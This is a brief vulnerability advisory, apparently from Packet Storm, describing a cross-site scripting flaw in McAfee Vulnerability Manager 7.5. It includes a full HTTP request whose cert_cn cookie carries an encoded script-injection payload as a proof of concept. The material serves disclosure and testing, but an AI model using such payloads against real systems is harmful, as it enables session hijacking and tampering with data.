McAfee Vulnerability Manager version 7.5 suffers from a cross site scripting vulnerability due to improperly sanitizing user-supplied Cookie values.
566957c0cfaab8f9b783af3bdf8496ff6eb513ff719e2c486f97028c19b84632================================================================================================================================================================
McAfee® Vulnerability Manager 7.5 cross-site scripting (XSS) Vulnerability
================================================================================================================================================================
#Date- 8/3/2013
# code by Asheesh kumar Mani Tripathi
# Credit by Asheesh Anaconda
#Vulnerbility
McAfee® Vulnerability Manager 7.5 is prone to an cross-site scripting (XSS) Vulnerability because the application fails to properly
sanitize user-supplied input
#Impact
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities
========================================================================================================================
Request
========================================================================================================================
GET /index.exp HTTP/1.1
Cookie: identity=p805oa53c0dab5vpcv1da30me7; cert_cn=%27%22%28%29%26%251%3CScRiPt %3Eprompt%28920847%29%3C%2FScRiPt%3E; remember=remember
Host: 172.28.1.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed